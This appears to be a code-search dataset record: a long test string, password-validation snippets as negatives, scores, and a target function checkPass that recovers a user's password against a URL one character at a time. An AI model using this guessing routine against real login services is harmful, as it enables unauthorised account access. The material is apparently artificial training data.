abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCD\"\n result = Solution().lengthOfLongestSubstring2(s)\n self.assertEqual(result, 95)", "def valid_pw(password, h):\n salt = h.split(',')[0]\n return h == make_pw_hash(password, salt)", "def _get_unique_chars(self, data_string):\n unique_chars = list(set(data_string))\n return unique_chars", "def old_password (string):\n\t\n\treturn hexdigest_mySQL41prior (string)", "def valid_pass(password):\r\n if len(password) >= 8 and len(password) <= 25 and password != \"forgot\":\r\n return True\r\n\r\n else:\r\n print(\"This is not a vaid password\")\r\n print(\"Password should be between 8 and 25 letters\")\r\n\r\n return False", "def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n return False\n\n return True", "def password_validator(password):\n if list(PUNCTUATIONS) in password:\n \"\"\"\n >>> list(string.punctuation)\n ['!', '\"', '#', '$', '%', '&', \"'\", '(', ')', '*', '+', ',', '-', '.',\n '/', ':', ';', '<', '=', '>', '?', '@', '[', '\\\\', ']', '^', '_', '`',\n '{', '|', '}', '~']\n >>>\n \"\"\"\n return False\n else:\n return True", "def is_valid_password_v1(password):\n letter_count = sum([x == password[\"letter\"] for x in list(password[\"password\"])])\n return password[\"low\"] <= letter_count <= password[\"high\"]", "def test_multiple_char_unique(self):\n self.assertTrue(all_unique_chars(\"ab\"))\n self.assertTrue(all_unique_chars(\"ba\"))\n self.assertTrue(all_unique_chars(\"make\"))\n self.assertTrue(all_unique_chars(\"thorn\"))\n self.assertTrue(all_unique_chars(\"malibu\"))\n self.assertTrue(all_unique_chars(string.ascii_letters))", "def is_valid_password(password, username):\n import string\n if len(password) < 4 or ' ' in password:\n return False\n if username:\n if string.lower(username) in string.lower(password):\n return False\n return True", "def get_password(length: int, specials: bool = True, specials_customized: str = \"\") -> str:\n if length < 8:\n raise ValueError('The number of signs must be at least 6 characters.')\n if specials:\n len_lowercase_letters = ceil(length * 0.4)\n len_uppercase_letters = ceil(length * 0.2)\n len_digits = ceil(length * 0.3)\n len_puncts = ceil(length * 0.1)\n while sum([len_lowercase_letters, len_uppercase_letters, len_digits, len_puncts]) > length:\n len_lowercase_letters -= 1\n lower_letters = choices(ascii_lowercase, k=len_lowercase_letters)\n upper_letters = choices(ascii_uppercase, k=len_uppercase_letters)\n digits_ = choices(digits, k=len_digits)\n if not specials_customized:\n puncts = choices(punctuation, k=len_puncts)\n else:\n puncts = choices(specials_customized, k=len_puncts)\n else:\n len_lowercase_letters = ceil(length * 0.5)\n len_uppercase_letters = ceil(length * 0.2)\n len_digits = ceil(length * 0.3)\n while sum([len_lowercase_letters, len_uppercase_letters, len_digits]) > length:\n len_lowercase_letters -= 1\n lower_letters = choices(ascii_lowercase, k=len_lowercase_letters)\n upper_letters = choices(ascii_uppercase, k=len_uppercase_letters)\n digits_ = choices(digits, k=len_digits)\n puncts = []\n\n return ''.join(sample(lower_letters + upper_letters + digits_ + puncts, k=length))", "def test_user1_method3():\n REGEX_MATCH_BCRYPT_HASH = r\"^\\$2[ayb]\\$.{56}$\"\n hashed_password = u.password.decode()\n assert re.match(REGEX_MATCH_BCRYPT_HASH, hashed_password), \"Password was not hashed correctly\"", "def acceptable_password(password):\r\n LOG.debug(\"PASS\")\r\n LOG.debug(password)\r\n\r\n if password is not None:\r\n LOG.debug(len(password))\r\n\r\n if password is None:\r\n return False\r\n\r\n if len(password) < 3:\r\n return False\r\n\r\n return True", "def check_pass(text):\r\n\r\n upperRegex = re.compile(r'[A-Z]')\r\n lowerRegex = re.compile(r'[a-z]')\r\n lengthRegex = re.compile(r'.{8,}')\r\n digitRegex = re.compile(r'\\d')\r\n\r\n if not upperRegex.search(text):\r\n return False\r\n elif not lowerRegex.search(text):\r\n return False\r\n elif not lengthRegex.search(text):\r\n return False\r\n elif not digitRegex.search(text):\r\n return False\r\n else:\r\n return True", "def clean_password2(self):\n\t\tpassword = self.cleaned_data['password']\n\t\trepetir_password = self.cleaned_data['repetir_password']\n\t\tif password != repetir_password:\n\t\t\traise forms.ValidationError('Las contraseñas no coinciden.')\n\t\treturn repetir_password", "def decypher(s):\n return \"\".join(map(chr, [97+(ord(c)-95)%25 if c.isalpha() else ord(c) for c in s]))", "def valid_pw(name, password, h):\n salt = h.split(',')[0]\n return h == make_pw_hash(name, password, salt)", "def validate_password(self):\n # source: https://docs.python.org/2/howto/regex.html\n if not re.match(r\"[A-Za-z0-9@#]\", self.password):\n return 'Oops!, invalid password'\n elif len(self.password) < 6:\n return 'Password should be at least six characters long'\n return 'Valid password!'", "def clean_password2(self):\n\t\tpassword = self.cleaned_data['password']\n\t\trepetir_password = self.cleaned_data['repetir_password']\n\t\tif password != repetir_password:\n\t\t\traise forms.ValidationError('Las contrasenas no coinciden.')\n\t\treturn repetir_password", "def is_unique_chars_compare(string):\n\n for i, char in enumerate(string):\n for j, other_chars in enumerate(string):\n if i != j and char == other_chars:\n return False\n return True", "def check_for_validity_puzzle_2(pos: tuple, char: str, password: str):\n\n valid_pos, invalid_pos = pos\n # using xor\n if (password[valid_pos-1] == char) ^ (password[invalid_pos-1] == char):\n return True\n else:\n return False", "def find_message(text: str) -> str:\n if not all(ch in string.printable for ch in text):\n return\n elif not text:\n return \"\"\n if len(text) > 1000:\n return\n decode_message = \"\"\n # check case sensitive for a simple character in string\n for correct_char in [char for char in text\\\n if char.upper() == char and char.lower()\\\n in 'abcdefghijklmnopqrstuwxyz']:\n decode_message += correct_char\n return decode_message", "def validate_password1(self, password):\n return get_adapter().clean_password(password)", "def get_common_letters(word1: str, word2: str) -> str:\n\n common = ''\n for x, y in zip(word1, word2):\n if x == y:\n common += x\n\n return common" ]
[ "0.66974944", "0.64420664", "0.6421295", "0.642044", "0.63667226", "0.6365107", "0.6325546", "0.63089836", "0.6299588", "0.62728053", "0.62592286", "0.62546295", "0.6249797", "0.62487674", "0.6225312", "0.6205716", "0.62037766", "0.62024164", "0.6148876", "0.61458707", "0.6145218", "0.6120198", "0.6100961", "0.60869384", "0.6068112", "0.6067736", "0.60442996", "0.601255", "0.6002502", "0.5998498", "0.59979874", "0.5948396", "0.5947907", "0.59188366", "0.59037656", "0.59032005", "0.5885434", "0.5878207", "0.58678347", "0.5864101", "0.5846066", "0.58369035", "0.58335286", "0.5825666", "0.581921", "0.58060634", "0.58051544", "0.57935154", "0.57844275", "0.57827276", "0.5781435", "0.5776363", "0.5772614", "0.5771557", "0.57671905", "0.5753883", "0.57477826", "0.5741665", "0.5735398", "0.5724702", "0.5724702", "0.5718353", "0.56877375", "0.5686999", "0.5683717", "0.5682275", "0.5682005", "0.567174", "0.5670818", "0.56676155", "0.5635476", "0.56330276", "0.56325436", "0.5626855", "0.5621922", "0.56202704", "0.5616364", "0.5614659", "0.5605607", "0.56017774", "0.5598326", "0.559773", "0.5590348", "0.5588864", "0.5577842", "0.55727905", "0.55678123", "0.55618083", "0.5561223", "0.55586827", "0.5546096", "0.55366874", "0.5521966", "0.551844", "0.55181146", "0.5507557", "0.5506553", "0.5504492", "0.55039006", "0.5500972", "0.54983485" ]
0.0
-1
checks for a character in position i, and records it when the character at postion i was found.
def checkPass(username, url, charList, n): # dikt = {} password = "" for i in range(0, n): if(testPassword(password, username, url)): return password #password is found! # https://stackoverflow.com/questions/189645/how-to-break-out-of-multiple-loops-in-python ch = findChar(username, url, charList, i) # if(isinstance(ch, int))#if ch is int i, can't find a matching character at index i in password string # use try except instead of if(isinstance(ch, int)): # https://stackoverflow.com/questions/3501382/checking-whether-a-variable-is-an-integer-or-not try: password += ch except TypeError: # print(i) password += str(ch) #should be blank # raise ValueError("index i has no matching character") return password #only reached if password is too long for the given n
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
